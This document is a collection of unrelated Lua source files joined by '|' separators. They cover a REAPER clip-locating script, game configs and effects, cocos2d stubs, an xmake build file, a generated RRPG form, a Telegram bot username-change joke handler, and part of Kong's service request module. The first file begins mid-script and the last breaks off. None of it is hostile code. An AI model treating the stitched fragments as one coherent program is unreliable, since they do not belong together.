ret_bso = reaper.parse_timestr_pos(ret_bso, 5)
reaper.SetEditCurPos(ret_bso, true, true)
commandID = reaper.NamedCommandLookup("_SWS_AWSELTOEND")
reaper.Main_OnCommand(commandID, 0) --time selection to end of project
reaper.Main_OnCommand(40717, 0) --select all items in time selection
x = reaper.CountSelectedMediaItems(0)
i=0
while (i<x) do
item = reaper.GetSelectedMediaItem(0, i)
-- take = reaper.GetMediaItemTake(item, 0) --DEPRECATED
take = reaper.GetActiveTake( item ) --NEW AND SEXY
--nikolalkc edit
local its_audio_or_empty_item = 0
if take ~= nil then
its_audio_or_empty_item = 1
retval, stringNeedBig = reaper.GetSetMediaItemTakeInfo_String(take, "P_NAME", "", false)
stringNeedBig = string.gsub (stringNeedBig, "\n", "") --remove newlines
stringNeedBig = string.gsub (stringNeedBig, "\r", "") --remove newlines
stringNeedBig = string.gsub(stringNeedBig, "% ", "") -- remove spaces
else
local empty_item_note = reaper.ULT_GetMediaItemNote(item)
-- empty_item_note = string.gsub(empty_item_note, "-", [[:]]) --replace (-) with (:) --DEPRECATED - no more :
empty_item_note = string.gsub (empty_item_note, "\n", "")
empty_item_note = string.gsub (empty_item_note, "\r", "")
empty_item_note = string.gsub(empty_item_note, "% ", "") -- remove spaces
if empty_item_note ~= "" or empty_item_note ~= nil then -- ????
its_audio_or_empty_item = 2
stringNeedBig = empty_item_note
-- Msg(stringNeedBig)
end
end
if its_audio_or_empty_item > 0 then
wavstr = "WAV"
teststr = string.sub(stringNeedBig, -3)
teststr = string.upper(teststr)
if wavstr == teststr then
stringNeedBig = string.sub(stringNeedBig, 1, -5)
end
--nikolalkc edit
filetxt = string.gsub(filetxt, "% ", "") -- remove spaces
filetext_with_monkey = [[@]]..filetxt
--remove metadata from wGroup name
XXX = ParseCSVLine(stringNeedBig,";") --METAPARSE CHARACTER ;
if XXX[1] then
XXX[1] = string.gsub(XXX[1], '^%s*(.-)%s*$', '%1') --start (& end)
XXX[1] = string.gsub(XXX[1], '[ \t]+%f[\r\n%z]', '')--end
XXX[1] = string.gsub(XXX[1], "% ", "") -- remove spaces
end
--XXX[1] is name of the item before first semicolon (;) sign
--[[example:
filename = some_sound.wav
item_name = some_sound stringNeedBig == filetxt
item_name = @some_sound stringNeedBig == filetext_with_monkey
item_name = some_sound,some metadata XXX[1] == filetxt
item_name = @some_sound,some_metadata XXX[1] = filetext_with_monkey
]]
-- Msg("QUERY:"..tostring(filetxt))
-- Msg("@QUERY:"..tostring(filetext_with_monkey))
-- Msg("stringNeedBig:"..stringNeedBig)
-- Msg("XXX[1]:"..tostring(XXX[1]))
-- Msg("")
if stringNeedBig == filetxt or stringNeedBig == filetext_with_monkey or XXX[1] == filetxt or XXX[1] == filetext_with_monkey then
-- Msg("FOUND")
pos = reaper.GetMediaItemInfo_Value(item, "D_POSITION")
reaper.GetSet_LoopTimeRange(true, false, ret_bso, ret_bso, false)
reaper.Main_OnCommand(40289, 0) --unselect all items
reaper.SetMediaItemSelected(item, true)
reaper.SetEditCurPos(pos, true, true)
reaper.adjustZoom(1000, 1, true, -1)
track = reaper.GetMediaItem_Track(item)
reaper.Main_OnCommand(40286, 0) --go to previous track
temptrack = reaper.GetSelectedTrack(0, 0)
command=40286
while temptrack~=track do
reaper.Main_OnCommand(command, 0) --go to previous track
temptrack2 = reaper.GetSelectedTrack(0, 0)
if temptrack2==temptrack then
command=40285
end
temptrack=temptrack2
end
commandID = reaper.NamedCommandLookup("_WOL_SETVZOOMC_LASTSELTRACK")
reaper.Main_OnCommand(40913, 0) --zoom vertically
weallgood=1
break
end
end
i=i+1
end
if weallgood==0 then
reaper.SelectAllMediaItems(0, true)
x = reaper.CountSelectedMediaItems(0)
i=0
while (i<x) do
item = reaper.GetSelectedMediaItem(0, i)
-- take = reaper.GetMediaItemTake(item, 0)--DEPRECATED
take = reaper.GetActiveTake( item ) --NEW AND SEXY
--nikolalkc edit
local its_audio_or_empty_item = 0
if take ~= nil then
its_audio_or_empty_item = 1
retval, stringNeedBig = reaper.GetSetMediaItemTakeInfo_String(take, "P_NAME", "", false)
stringNeedBig = string.gsub (stringNeedBig, "\n", "") --remove newlines
stringNeedBig = string.gsub (stringNeedBig, "\r", "") --remove newlines
stringNeedBig = string.gsub(stringNeedBig, "% ", "") -- remove spaces
else
local empty_item_note = reaper.ULT_GetMediaItemNote(item)
-- empty_item_note = string.gsub(empty_item_note, "-", [[:]]) --replace (-) with (:) - DEPRECATED - no more :
empty_item_note = string.gsub (empty_item_note, "\n", "")
empty_item_note = string.gsub (empty_item_note, "\r", "")
empty_item_note = string.gsub(empty_item_note, "% ", "") -- remove spaces
if empty_item_note ~= "" or empty_item_note ~= nil then -- ????
its_audio_or_empty_item = 2
stringNeedBig = empty_item_note
end
end
if its_audio_or_empty_item > 0 then
--nikolalkc edit
filetxt = string.gsub(filetxt, "% ", "") -- remove spaces
filetext_with_monkey = [[@]]..filetxt
--remove metadata from wGroup name
XXX = ParseCSVLine(stringNeedBig,";") --METAPARSE CHARACTER ;
--remove unwanted spaces at start end end
if XXX[1] then
XXX[1] = string.gsub(XXX[1], '^%s*(.-)%s*$', '%1') --start (& end)
XXX[1] = string.gsub(XXX[1], '[ \t]+%f[\r\n%z]', '')--end
XXX[1] = string.gsub(XXX[1], "% ", "") -- remove spaces
end
--XXX[1] is name of the item before first semicolon (;) sign
--[[example:
filename = some_sound.wav
item_name = some_sound stringNeedBig == filetxt
item_name = @some_sound stringNeedBig == filetext_with_monkey
item_name = some_sound,some metadata XXX[1] == filetxt
item_name = @some_sound,some_metadata XXX[1] = filetext_with_monkey
]]
-- Msg("QUERY:"..tostring(filetxt))
-- Msg("@QUERY:"..tostring(filetext_with_monkey))
-- Msg("stringNeedBig:"..stringNeedBig)
-- Msg("XXX[1]:"..tostring(XXX[1]))
-- Msg("")
if stringNeedBig == filetxt or stringNeedBig == filetext_with_monkey or XXX[1] == filetxt or XXX[1] == filetext_with_monkey then
-- Msg("FOUND SIMILAR")
pos = reaper.GetMediaItemInfo_Value(item, "D_POSITION")
reaper.Main_OnCommand(40289, 0) --unselect all items
reaper.SetMediaItemSelected(item, true)
reaper.SetEditCurPos(pos, true, true)
reaper.adjustZoom(1000, 1, false, -1)
--commandID = reaper.NamedCommandLookup("_WOL_SETVZOOMC_LASTSELTRACK")
reaper.Main_OnCommand(40913, 0) --zoom vertically
reaper.GetSet_LoopTimeRange(true, false, ret_bso, ret_bso, false)
weallgood=1
reaper.ShowMessageBox("Timecode Offset doesn't match the file selected, but a clip in this session has the same filename, so perhaps this is the correct one...","Possible Error",0)
break
end
end
i=i+1
end
end
-- Msg([[WeeAllGood:]]..weallgood)
if weallgood==0 then
reaper.Main_OnCommand(40289, 0) --unselect all items
reaper.GetSet_LoopTimeRange(true, false, ret_bso, ret_bso, false)
reaper.adjustZoom(1000, 1, false, -1)
reaper.Main_OnCommand(40913, 0) --zoom vertically
local BBB = isRegion(ret_bso,filetxt)
if BBB == false then
reaper.ShowMessageBox("Couldn't Find That Filename in the Session...Sorry...","ERROR!!!!!!!",0)
else
edit_pos = reaper.GetCursorPosition()
delta_edit_pos = BBB - edit_pos
reaper.MoveEditCursor( delta_edit_pos, false )
reaper.adjustZoom(1000, 1, false, -1)
reaper.Main_OnCommand(40913, 0) --zoom vertically
-- Msg("REGION FOUND:"..BBB)
end
end
end
end
--ORIGINAL SCRIPT ENDS HERE--------------------------------------------------------------------------------------------------------------------
--NIKOLALKC OUTRO
-- focus temp and close
reaper.SelectProjectInstance( TempProject )
reaper.Main_OnCommand(40860,0) --close current project tab
reaper.SelectProjectInstance(project)
reaper.Main_OnCommand(reaper.NamedCommandLookup("_SWS_HSCROLL10"),0) --edit cursor 10%
reaper.PreventUIRefresh(-1)
reaper.UpdateArrange() |
ItemConfig["water_bottle"] = {
name = "Water Bottle",
type = "usable",
category = "Grocery",
price = 5,
interactions = {
use = {
use_label = "Drink",
sound = "sounds/drink.wav",
animation = { name = "DRINKING" },
event = "DrinkWater"
},
water = {
use_label = "Fill Bottle",
sound = "sounds/fill_water.wav",
animation = { id = 921, duration = 10000 },
event = "FillBottle"
}
},
modelid = 1022,
max_use = 3,
max_carry = 2,
attachment = {
x = -6,
y = 4,
z = -1,
rx = 35.8,
ry = -15.1,
rz = 0,
bone = "hand_r"
}
}
AddEvent("DrinkWater", function(player, object)
local health = GetPlayerHealth(player)
SetPlayerHealth(player, math.min(100, health + 5))
CallRemoteEvent(player, "ShowMessage", "Your health has increased")
end)
|
---@meta
---@class cc.TransitionPageTurn :cc.TransitionScene
local TransitionPageTurn={ }
cc.TransitionPageTurn=TransitionPageTurn
---* Returns the action that will be performed with size.<br>
---* param vector A given size.<br>
---* return The action that will be performed.
---@param vector size_table
---@return cc.ActionInterval
function TransitionPageTurn:actionWithSize (vector) end
---* Creates a base transition with duration and incoming scene.<br>
---* If back is true then the effect is reversed to appear as if the incoming<br>
---* scene is being turned from left over the outgoing scene.<br>
---* param t Duration time, in seconds.<br>
---* param scene A given scene.<br>
---* param backwards If back is true then the effect is reversed to appear as if the incoming scene is being turned from left over the outgoing scene.<br>
---* return True if initialize success.
---@param t float
---@param scene cc.Scene
---@param backwards boolean
---@return boolean
function TransitionPageTurn:initWithDuration (t,scene,backwards) end
---* Creates a base transition with duration and incoming scene.<br>
---* If back is true then the effect is reversed to appear as if the incoming<br>
---* scene is being turned from left over the outgoing scene.<br>
---* param t Duration time, in seconds.<br>
---* param scene A given scene.<br>
---* param backwards If back is true then the effect is reversed to appear as if the incoming scene is being turned from left over the outgoing scene.<br>
---* return An autoreleased TransitionPageTurn object.
---@param t float
---@param scene cc.Scene
---@param backwards boolean
---@return self
function TransitionPageTurn:create (t,scene,backwards) end
---*
---@param renderer cc.Renderer
---@param transform mat4_table
---@param flags unsigned_int
---@return self
function TransitionPageTurn:draw (renderer,transform,flags) end
---* js ctor
---@return self
function TransitionPageTurn:TransitionPageTurn () end |
set_project("log")
set_version("0.10", {build = "%Y%m%d%H%M"})
set_xmakever("2.5.3")
set_config("buildir", "xmake.Build")
set_config("mode", "debug")
set_config("plat", "macosx")
set_config("arch", "x86_64")
set_config("cxflags", "-O2")
target("test")
set_kind("binary")
set_targetdir("$(buildir)/$(mode)")
add_defines("LOG_USE_COLOR")
add_files("test/test.c")
add_includedirs(
"."
)
add_cflags("-std=c99")
after_build(function(target)
import("core.base.task")
task.run("project", {kind = "compile_commands"})
end)
|
-----------------------------------
--
-- tpz.effect.CAROL
--
-----------------------------------
require("scripts/globals/status")
require("scripts/globals/magic")
-----------------------------------
function onEffectGain(target, effect)
target:addMod(tpz.magic.resistMod[effect:getSubPower()], effect:getPower())
end
function onEffectTick(target, effect)
end
function onEffectLose(target, effect)
target:delMod(tpz.magic.resistMod[effect:getSubPower()], effect:getPower())
end
|
require("rrpg.lua");
local __o_rrpgObjs = require("rrpgObjs.lua");
require("rrpgGUI.lua");
require("rrpgDialogs.lua");
require("rrpgLFM.lua");
require("ndb.lua");
function newfrmGerenciador01_Sessao()
__o_rrpgObjs.beginObjectsLoading();
local obj = gui.fromHandle(_obj_newObject("form"));
local self = obj;
local sheet = nil;
rawset(obj, "_oldSetNodeObjectFunction", rawget(obj, "setNodeObject"));
function obj:setNodeObject(nodeObject)
sheet = nodeObject;
self.sheet = nodeObject;
self:_oldSetNodeObjectFunction(nodeObject);
end;
function obj:setNodeDatabase(nodeObject)
self:setNodeObject(nodeObject);
end;
_gui_assignInitialParentForForm(obj.handle);
obj:beginUpdate();
obj:setName("frmGerenciador01_Sessao");
obj:setHeight(35);
obj:setTheme("dark");
obj:setMargins({top=1});
obj.rectangle1 = gui.fromHandle(_obj_newObject("rectangle"));
obj.rectangle1:setParent(obj);
obj.rectangle1:setLeft(0);
obj.rectangle1:setTop(0);
obj.rectangle1:setWidth(530);
obj.rectangle1:setHeight(35);
obj.rectangle1:setColor("#212121");
obj.rectangle1:setName("rectangle1");
obj.edit1 = gui.fromHandle(_obj_newObject("edit"));
obj.edit1:setParent(obj.rectangle1);
obj.edit1:setLeft(5);
obj.edit1:setTop(5);
obj.edit1:setWidth(30);
obj.edit1:setHeight(25);
obj.edit1:setField("numero");
obj.edit1:setType("number");
obj.edit1:setName("edit1");
obj.edit2 = gui.fromHandle(_obj_newObject("edit"));
obj.edit2:setParent(obj.rectangle1);
obj.edit2:setLeft(35);
obj.edit2:setTop(5);
obj.edit2:setWidth(80);
obj.edit2:setHeight(25);
obj.edit2:setField("data");
obj.edit2:setName("edit2");
obj.button1 = gui.fromHandle(_obj_newObject("button"));
obj.button1:setParent(obj.rectangle1);
obj.button1:setLeft(115);
obj.button1:setTop(5);
obj.button1:setWidth(50);
obj.button1:setHeight(25);
obj.button1:setText("LOG");
obj.button1:setHint("Abrir Log");
obj.button1:setName("button1");
obj.edit3 = gui.fromHandle(_obj_newObject("edit"));
obj.edit3:setParent(obj.rectangle1);
obj.edit3:setLeft(165);
obj.edit3:setTop(5);
obj.edit3:setWidth(100);
obj.edit3:setHeight(25);
obj.edit3:setField("log");
obj.edit3:setName("edit3");
obj.button2 = gui.fromHandle(_obj_newObject("button"));
obj.button2:setParent(obj.rectangle1);
obj.button2:setLeft(265);
obj.button2:setTop(5);
obj.button2:setWidth(25);
obj.button2:setHeight(25);
obj.button2:setText("X");
obj.button2:setName("button2");
obj._e_event0 = obj.button1:addEventListener("onClick",
function (self)
gui.openInBrowser(sheet.log);
end, obj);
obj._e_event1 = obj.button2:addEventListener("onClick",
function (self)
dialogs.confirmOkCancel("Tem certeza que quer apagar essa sessao?",
function (confirmado)
if confirmado then
ndb.deleteNode(sheet);
end;
end);
end, obj);
function obj:_releaseEvents()
__o_rrpgObjs.removeEventListenerById(self._e_event1);
__o_rrpgObjs.removeEventListenerById(self._e_event0);
end;
obj._oldLFMDestroy = obj.destroy;
function obj:destroy()
self:_releaseEvents();
if (self.handle ~= 0) and (self.setNodeDatabase ~= nil) then
self:setNodeDatabase(nil);
end;
if self.edit3 ~= nil then self.edit3:destroy(); self.edit3 = nil; end;
if self.rectangle1 ~= nil then self.rectangle1:destroy(); self.rectangle1 = nil; end;
if self.edit1 ~= nil then self.edit1:destroy(); self.edit1 = nil; end;
if self.edit2 ~= nil then self.edit2:destroy(); self.edit2 = nil; end;
if self.button1 ~= nil then self.button1:destroy(); self.button1 = nil; end;
if self.button2 ~= nil then self.button2:destroy(); self.button2 = nil; end;
self:_oldLFMDestroy();
end;
obj:endUpdate();
__o_rrpgObjs.endObjectsLoading();
return obj;
end;
local _frmGerenciador01_Sessao = {
newEditor = newfrmGerenciador01_Sessao,
new = newfrmGerenciador01_Sessao,
name = "frmGerenciador01_Sessao",
dataType = "",
formType = "undefined",
formComponentName = "form",
title = "",
description=""};
frmGerenciador01_Sessao = _frmGerenciador01_Sessao;
rrpg.registrarForm(_frmGerenciador01_Sessao);
return _frmGerenciador01_Sessao;
|
object_tangible_loot_beast_beast_steroid_spider_tanray_mk2 = object_tangible_loot_beast_shared_beast_steroid_spider_tanray_mk2:new {
}
ObjectTemplates:addTemplate(object_tangible_loot_beast_beast_steroid_spider_tanray_mk2, "object/tangible/loot/beast/beast_steroid_spider_tanray_mk2.iff")
|
local name = ''
init = function (param)
print('init .....', param)
name = param
return 0
end
quit = function ()
print('quit .....')
return 0
end
on_cmd = function (msg, lparam, wparam, cobj)
print('on_cmd.name:'..name, msg, lparam, wparam, cobj)
return 0
end
|
Name = "Wall"
Order = 0.8 -- Controls sort order for ID use. In the next patch ONLY names will be allowed!
Hint = "$4954"
Title = "$5464"
Hotkey = 107
AI = 5
Icon = {
texture = "DATA:UI\\NewUI\\Taskbar\\FormationIcons\\form_ico_wall.dds",
uvRect = { 0/128, 0/512, 128/128, 128/512 },
patch_X = { 4,-120, 4,0 },
patch_Y = { 4,-120,4, 0 },
patch_Scale = 1,
Surface = {
surface = "ui_multistate";
{ prop = "state0", float3 = { 0.0, 0.0, 1.0 } },
{ prop = "state1", float3 = { 0.0, 0.0, 0.0 } },
{ prop = "state2", float3 = { 0.0, 0.0, 0.0 } },
{ prop = "decal", float3 = { 0.0, 0.0, 0.0 } },
}
}
ExtFilter = "sgf_gbx,sgf_hwrm"
Tags = "sgf_common"
StanceGrouping = "Batch"
StanceGroupingAg = "Shape"
StanceGroupingEv = "Subs"
DeathDamage = 0.90
FriendlyFire = { 0.8, 0.0, 0.0 } -- Base, Pop, PopSqrt
PopDecay = 0.01
SpacingRange = { 25, 1.75, 150, 1.35 }
SpacingRangeAg = { 25, 1.75, 150, 1.35 }
SpacingRangeEv = { 25, 2.50, 150, 1.50 }
Multipliers = {
-- Leader //Const, PopRaw-1, PopSqrt-1
-- Node //Nodedepth, LoMult,Above&AtUse4th,HiMult
-- Accel/Brake// times_ so to 'accel faster' you mult _down_ (0.5 is twice as fast)
MAXSPEED = {
-- HW2 Pop - 3,4,6,9,12,15
-- HW2 Scout - 1,1+,2,3,4,5
-- Hig Pop - 5,6,10,15,20,25
-- Hig Fighter - 1,1+,2,3,4,5
-- Hig Pop - 3,4,6,12,18,21
-- Hig Vette - 1,1+,2,4,6,7
-- Vay Pop - 7,8,14,21,28,35
-- Vay Fighter -1,1+,2,3,4,5
-- Vay Pop - 6,7,12,18,24,30
-- Vay Bomber - 1,1+,2,3,4,5
-- Vaygr Pop 4,5,8,16,24,28
-- Vay Vette - 1,1+,2,4,6,7
{ "Fighter", "Graph", 1, 0.95, 20, 0.87},
{ "Fighter_hw1", "Graph", 1, 0.95, 20, 0.87},
--{ "Vgr_Interceptor",AggressiveStance, "Graph", 1, 1.0, 7, 1.0},
},
FLIGHTPERF = {
{ "Fighter", "Graph", 1, 0.86, 20, 0.84},
{ "Fighter_hw1", "Graph", 1, 0.86, 20, 0.84},
{ "Corvette", "Graph", 3, 0.965, 4, 0.965, 6, 0.965, 12, 0.95, 18, 0.95},
{ "Corvette_hw1", "Graph", 3, 0.965, 4, 0.965, 6, 0.965, 12, 0.95, 18, 0.95},
{ "Vgr_MissileCorvette", "Graph", 4, 0.965, 5, 0.965, 8, 0.965, 16, 0.95, 24, 0.95},
{ "Vgr_LaserCorvette", "Graph", 4, 0.965, 5, 0.965, 8, 0.965, 16, 0.95, 24, 0.95},
},
ENGINEACCEL = {
{ "Corvette", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.65, 21, 0.60},
{ "Corvette_hw1", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.65, 21, 0.60},
},
ENGINEBRAKE = {
},
THRUSTER = {
},
THRUSTERACCEL = {
{ "Fighter", "Graph", 1, 0.90, 25, 0.90},
{ "Fighter_hw1", "Graph", 1, 0.90, 25, 0.90},
{ "Corvette", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.65, 21, 0.60},
{ "Corvette_hw1", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.65, 21, 0.60},
},
THRUSTERBRAKE = {
},
ROTATION = {
{ "Corvette", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.60, 21, 0.50 },
{ "Corvette_hw1", "Graph", 3, 0.85, 4, 0.85, 6, 0.85, 12, 0.85, 18, 0.60, 21, 0.50 },
},
ROTATIONACCEL = {
},
ROTATIONBRAKE = {
},
WEAPONCONE = {
-- HW2 Pop - 3,4,6,9,12,15
-- HW2 Scout - 1,1+,2,3,4,5
-- Hig Pop - 5,6,10,15,20
-- Hig Fighter - 1,1+,2,3,4
-- Hig Pop - 3,4,6,12,18
-- Hig Vette - 1,1+,2,4,6
-- Vay Pop - 7,8,14,21,28,35
-- Vay Fighter -1,1+,2,3,4,5
-- Vay Pop - 6,7,12,18,24,30
-- Vay Bomber - 1,1+,2,3,4,5
-- Vaygr Pop 4,5,8,16,24
-- Vay Vette - 1,1+,2,4,6
{ "Corvette", "Graph", 3, 1.0, 4, 0.98, 6, 0.98, 12, 1.01 },
{ "Corvette_hw1", "Graph", 3, 1.0, 4, 0.98, 6, 0.98, 12, 1.01 },
{ "Vgr_LaserCorvette", "Graph", 4, 1.0, 5, 0.98, 8, 0.98, 16, 1.01 },
},
WEAPONACCURACY = {
-- HW2 Pop - 3,4,6,9,12,15
-- HW2 Scout - 1,1+,2,3,4,5
-- Hig Pop - 5,6,10,15,20
-- Hig Fighter - 1,1+,2,3,4
-- Hig Pop - 3,4,6,12,18
-- Hig Vette - 1,1+,2,4,6
-- Vay Pop - 7,8,14,21,28,35
-- Vay Fighter -1,1+,2,3,4,5
-- Vay Pop - 6,7,12,18,24,30
-- Vay Bomber - 1,1+,2,3,4,5
-- Vaygr Pop 4,5,8,16,24
-- Vay Vette - 1,1+,2,4,6
--{ "Corvette",AggressiveStance, "Graph", 1, 1.01, 3, 1.01},
--{ "Corvette_hw1",AggressiveStance, "Graph", 1, 1.01, 3, 1.01},
},
WEAPONDAMAGE = {
-- HW2 Pop - 3,4,6,9,12,15
-- HW2 Scout - 1,1+,2,3,4,5
-- Hig Pop - 5,6,10,15,20
-- Hig Fighter - 1,1+,2,3,4
-- Hig Pop - 3,4,6,12,18
-- Hig Vette - 1,1+,2,4,6
-- Vay Pop - 7,8,14,21,28,35
-- Vay Fighter -1,1+,2,3,4,5
-- Vay Pop - 6,7,12,18,24,30
-- Vay Bomber - 1,1+,2,3,4,5
-- Vaygr Pop 4,5,8,16,24
-- Vay Vette - 1,1+,2,4,6
--{ "Fighter",AggressiveStance, "Graph", 1, 1.01, 5, 1.01},
--{ "Fighter_hw1",AggressiveStance, "Graph", 1, 1.01, 5, 1.01},
--{ "Corvette",AggressiveStance, "Graph", 1, 1.01, 3, 1.01},
--{ "Corvette_hw1",AggressiveStance, "Graph", 1, 1.01, 3, 1.01},
},
BULLETSPEED = {
-- HW2 Pop - 3,4,6,9,12,15
-- HW2 Scout - 1,1+,2,3,4,5
-- Hig Pop - 5,6,10,15,20
-- Hig Fighter - 1,1+,2,3,4
-- Hig Pop - 3,4,6,12,18
-- Hig Vette - 1,1+,2,4,6
-- Vay Pop - 7,8,14,21,28,35
-- Vay Fighter -1,1+,2,3,4,5
-- Vay Pop - 6,7,12,18,24,30
-- Vay Bomber - 1,1+,2,3,4,5
-- Vaygr Pop 4,5,8,16,24
-- Vay Vette - 1,1+,2,4,6
--{ "Corvette",AggressiveStance, "Graph", 1, 1.0, 5, 1.10},
--{ "Corvette_hw1",AggressiveStance, "Graph", 1, 1.0, 5, 1.10},
--{ "Vgr_Interceptor",AggressiveStance, "Graph", 1, 1.0, 7, 1.0},
--{ "Vgr_LaserCorvette",AggressiveStance, "Graph", 1, 1.0, 5, 1.03},
--{ "Kus_LightCorvette",AggressiveStance, "Graph", 1, 1.0, 4, 1.0, 21, 1.10},
--{ "Tai_LightCorvette",AggressiveStance, "Graph", 1, 1.0, 4, 1.0, 21, 1.10},
},
TURRETSPEED = {
--{ "Corvette",AggressiveStance, "Graph", 1, 1.09, 4, 1.09, 21, 1.10},
--{ "Corvette_hw1",AggressiveStance, "Graph", 1, 1.09, 4, 1.09, 21, 1.10},
--{ "Kus_LightCorvette",AggressiveStance, "Graph", 1, 1.05, 4, 1.05, 21, 1.05},
--{ "Tai_LightCorvette",AggressiveStance, "Graph", 1, 1.05, 4, 1.05, 21, 1.05},
},
ACCURACYAPPLIED = {
},
DAMAGEAPPLIED = {
},
FIRERATE = {
--{ "Fighter",AggressiveStance, "Graph", 1, 0.80, 5, 0.80, 10, 0.80},
--{ "Fighter_hw1",AggressiveStance, "Graph", 1, 0.80, 5, 0.80, 10, 0.80},
--{ "Vgr_Interceptor",AggressiveStance, "Graph", 1, 0.90, 7, 0.90, 14, 0.90},
--{ "Hgn_AttackBomber",AggressiveStance, "Graph", 1, 1.0, 5, 1.0, 6, 0.98},
--{ "Vgr_Bomber",AggressiveStance, "Graph", 1, 1.0, 6, 1.0, 7, 0.98},
--{ "Kus_AttackBomber",AggressiveStance, "Graph", 1, 1.0, 5, 1.0, 6, 0.98},
--{ "Tai_AttackBomber",AggressiveStance, "Graph", 1, 1.0, 5, 1.0, 6, 0.98},
--{ "Corvette",AggressiveStance, "Graph", 5, 0.98, 6, 0.98 },
--{ "Corvette_hw1",AggressiveStance, "Graph", 5, 0.98, 6, 0.98 },
},
}
UnitLimit = 32
SupplyLimits =
{
LayoutFighter = 21,
LayoutCorvette = 21,
LayoutFrigate = 11,
LayoutDestroyer = 5,
LayoutBattleCruiser = 1,
LayoutResource = 9,
}
--SubFormations =
--{
-- Fighter = "Delta",
--}
strikegroup =
{
OffsetFromParent = {0,0,0},
Children =
{
{
Name = "ArmL",
OffsetFromParent = {-1.01999,0.15,0},
Children =
{
{
OffsetFromParent = {0.15,1.019999,0},
},
{
OffsetFromParent = {-0.15,-1.019997,0},
},
},
Proxies = { "ArmL" },
},
{
Name = "ArmR",
OffsetFromParent = {1.01998,-0.15,0},
Children =
{
{
OffsetFromParent = {0.15,1.019998,0},
},
{
OffsetFromParent = {-0.15,-1.019996,0},
},
},
Proxies = { "ArmR" },
},
{
OffsetFromParent = {0.15,1.01997,0},
},
{
OffsetFromParent = {-0.15,-1.01996,0},
},
},
}
|
local function ChangeUser(msg)
local text = msg.content_.text_
if ChatType == 'sp' or ChatType == 'gp' then
if text then
tdcli_function({ID = "GetUser",user_id_ = msg.sender_user_id_},function(arg,result)
if result.id_ then
local abbs = DevAbs:get("DevProxTEAM:User"..result.id_)
if not result.username_ then
if abbs then
Dev_Abs(msg.chat_id_, msg.id_, 1, "حذف معرفه خمطو بسرعه، 😹💔 \nهذا معرفه @"..abbs.."", 1, 'html')
DevAbs:del("DevProxTEAM:User"..result.id_)
end
end
if result.username_ then
if abbs and abbs ~= result.username_ then
local abs_text = {
'معرفك الجديد عشره بربع محد ياخذه😹💔',
"هاها غيرت معرفك نشروك بقناة فضايح😹💔💭",
"معرفك الجديد حلو منين خامطه؟!🤤♥️",
"معرفك القديم @"..result.username_.." ضمه بقناة لاينبعص، 😹♥️",
}
abbss = math.random(#abs_text)
Dev_Abs(msg.chat_id_, msg.id_, 1, abs_text[abbss], 1, 'html')
end
DevAbs:set("DevProxTEAM:User"..result.id_, result.username_)
end
end
end,nil)
end
end
end
return {
DevProx = ChangeUser
}
|
---
-- Module for manipulating the request sent to the Service.
-- @module kong.service.request
local cjson = require "cjson.safe"
local checks = require "kong.pdk.private.checks"
local phase_checker = require "kong.pdk.private.phases"
local ngx = ngx
local ngx_var = ngx.var
local table_insert = table.insert
local table_sort = table.sort
local table_concat = table.concat
local type = type
local string_find = string.find
local string_sub = string.sub
local string_byte = string.byte
local string_lower = string.lower
local normalize_header = checks.normalize_header
local normalize_multi_header = checks.normalize_multi_header
local validate_header = checks.validate_header
local validate_headers = checks.validate_headers
local check_phase = phase_checker.check
local escape = require("kong.tools.uri").escape
local PHASES = phase_checker.phases
local access_and_rewrite = phase_checker.new(PHASES.rewrite, PHASES.access)
local preread_and_balancer = phase_checker.new(PHASES.preread, PHASES.balancer)
local access_rewrite_balancer = phase_checker.new(PHASES.rewrite, PHASES.access, PHASES.balancer)
---
-- Produce a lexicographically ordered querystring, given a table of values.
--
-- @tparam table args A table where keys are strings and values are strings, booleans,
-- or an array of strings or booleans.
-- @treturn string|nil an URL-encoded query string, or nil if an error ocurred
-- @treturn string|nil and an error message if an error ocurred, or nil
local function make_ordered_args(args)
local out = {}
local t = {}
for k, v in pairs(args) do
if type(k) ~= "string" then
return nil, "arg keys must be strings"
end
t[k] = v
local pok, s = pcall(ngx.encode_args, t)
if not pok then
return nil, s
end
table_insert(out, s)
t[k] = nil
end
table_sort(out)
return table_concat(out, "&")
end
-- The service request module: functions for dealing with data to be sent
-- to the service, i.e. for connections made by Kong.
local function new(self)
local request = {}
-- TODO these constants should be shared with kong.request
local CONTENT_TYPE = "Content-Type"
local CONTENT_TYPE_POST = "application/x-www-form-urlencoded"
local CONTENT_TYPE_JSON = "application/json"
local CONTENT_TYPE_FORM_DATA = "multipart/form-data"
local SLASH = string_byte("/")
---
-- Enables buffered proxying, which allows plugins to access Service body and
-- response headers at the same time.
-- @function kong.service.request.enable_buffering
-- @phases `rewrite`, `access`
-- @return Nothing.
-- @usage
-- kong.service.request.enable_buffering()
request.enable_buffering = function()
check_phase(access_and_rewrite)
if ngx.req.http_version() >= 2 then
error("buffered proxying cannot currently be enabled with http/" ..
ngx.req.http_version() .. ", please use http/1.x instead", 2)
end
ngx.ctx.buffered_proxying = true
end
---
-- Sets the protocol to use when proxying the request to the Service.
-- @function kong.service.request.set_scheme
-- @phases `access`
-- @tparam string scheme The scheme to be used. Supported values are `"http"` or `"https"`.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_scheme("https")
request.set_scheme = function(scheme)
check_phase(PHASES.access)
if type(scheme) ~= "string" then
error("scheme must be a string", 2)
end
if scheme ~= "http" and scheme ~= "https" then
error("invalid scheme: " .. scheme, 2)
end
ngx_var.upstream_scheme = scheme
end
---
-- Sets the path component for the request to the service.
--
-- The input accepts any valid *normalized* URI (including UTF-8 characters)
-- and this API will perform necessary escaping according to the RFC
-- to make the request valid.
--
-- Input should **not** include the query string.
-- @function kong.service.request.set_path
-- @phases `access`
-- @tparam string path The path string. Special characters and UTF-8
-- characters are allowed, for example: `"/v2/movies"` or `"/foo/😀"`.
-- @return Nothing; throws an error on invalid inputs.
-- @usage
-- kong.service.request.set_path("/v2/movies")
request.set_path = function(path)
check_phase(PHASES.access)
if type(path) ~= "string" then
error("path must be a string", 2)
end
if string_byte(path) ~= SLASH then
error("path must start with /", 2)
end
ngx_var.upstream_uri = escape(path)
end
---
-- Sets the query string of the request to the Service. The `query` argument is a
-- string (without the leading `?` character), and is not processed in any
-- way.
--
